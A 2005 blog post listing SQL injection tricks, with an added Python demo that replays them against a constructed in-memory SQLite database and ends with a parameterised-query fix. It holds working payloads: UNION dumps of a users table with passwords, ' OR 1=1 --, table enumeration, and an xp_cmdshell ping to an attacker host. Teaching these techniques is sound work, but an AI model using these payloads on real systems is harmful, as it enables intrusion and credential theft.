Friday, June 24, 2005

SQL Injection - Tricks

Tricks attackers use

- UNION statements to append rows pulled from other tables to the result of the intended query (the injected SELECT has to return the same number of columns as the original one).
- The "--" double-hyphen comment indicator to comment out whatever remains of the intended SQL after the injected part.
- A single quote in an input field to see whether the query fails. A database error coming back usually means the input is being concatenated into the SQL text without validation or escaping, and the field is probably exploitable.
- The always-true logical expression ' OR 1=1 -- to defeat the WHERE clause and return every record.
- exec master..xp_cmdshell 'ping HACKER_IP' to check for hosts where the application connects with 'sa' (sysadmin) privileges; an ICMP echo request arriving at the attacker's host confirms command execution. (From SQL Server 2005 onward xp_cmdshell is disabled by default and has to be turned on with sp_configure, so a silent failure does not rule out sysadmin rights.)
- select name from sysobjects where type = 'u' to list the user tables worth targeting.
- INSERT INTO tablename EXEC sp_whatever, a good way to capture the output of a stored procedure into a table that can then be read back through the injection point.
- @@version to return the SQL Server version, service pack level and OS version.
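The following is an added example, not code from the original post. It replays the payloads above against a deliberately injectable query so the mechanics can be watched offline; the database is a constructed in-memory SQLite one (so sqlite_master and sqlite_version() stand in for the SQL Server specifics sysobjects and @@version, and xp_cmdshell and INSERT ... EXEC, which exist only on SQL Server, are not shown), and the table layout, function names and sample rows are assumptions made for the demonstration. The parameterised query at the end is the fix a practitioner would want beside the attack.

```python
import sqlite3


# Constructed, in-memory stand-in for the application's database: a products
# table the application intends to query, and a users table the attacker wants.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2');
    """)
    return conn


def vulnerable_search(conn, term):
    """The injectable pattern: user input spliced straight into the SQL text."""
    sql = "SELECT id, name, price FROM products WHERE name = '" + term + "'"
    return conn.execute(sql).fetchall()


def safe_search(conn, term):
    """Same query with a bound parameter: the driver never parses the input as SQL."""
    sql = "SELECT id, name, price FROM products WHERE name = ?"
    return conn.execute(sql, (term,)).fetchall()


def single_quote_probe(conn):
    """A lone quote leaves the string literal unterminated. A syntax error from
    the database is the tell that input reaches the parser unescaped."""
    try:
        vulnerable_search(conn, "'")
        return False
    except sqlite3.OperationalError:
        return True


def run_tricks():
    """Replays the post's payloads against the vulnerable function and the
    parameterised one, returning what each query handed back."""
    conn = make_db()
    results = {}
    results["quote_probe"] = single_quote_probe(conn)

    # ' OR 1=1 -- makes the WHERE clause always true; the -- comments out the
    # application's own closing quote so the statement still parses.
    results["or_true"] = vulnerable_search(conn, "' OR 1=1 --")

    # UNION appends rows from another table. The injected SELECT must produce
    # the same number of columns (three here) as the original query.
    results["union_dump"] = sorted(vulnerable_search(
        conn, "' UNION SELECT id, username, password FROM users --"))

    # Table enumeration, SQLite flavour: sqlite_master plays the role of
    # sysobjects (type = 'table' instead of type = 'u').
    rows = vulnerable_search(
        conn, "' UNION SELECT 1, name, sql FROM sqlite_master WHERE type = 'table' --")
    results["tables"] = sorted(r[1] for r in rows)

    # Version fingerprint, SQLite flavour: sqlite_version() in place of @@version.
    rows = vulnerable_search(conn, "' UNION SELECT 1, sqlite_version(), 0 --")
    results["version"] = rows[0][1]

    # The same OR 1=1 payload against the parameterised query is just a string
    # value that matches no product name.
    results["safe"] = safe_search(conn, "' OR 1=1 --")
    return results


if __name__ == "__main__":
    for name, value in run_tricks().items():
        print(f"{name}: {value}")
```

On SQL Server the same UNION technique carries sysobjects names and @@version out through the injection point; the xp_cmdshell ping in the list above is an out-of-band check for the cases where nothing is echoed back at all.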
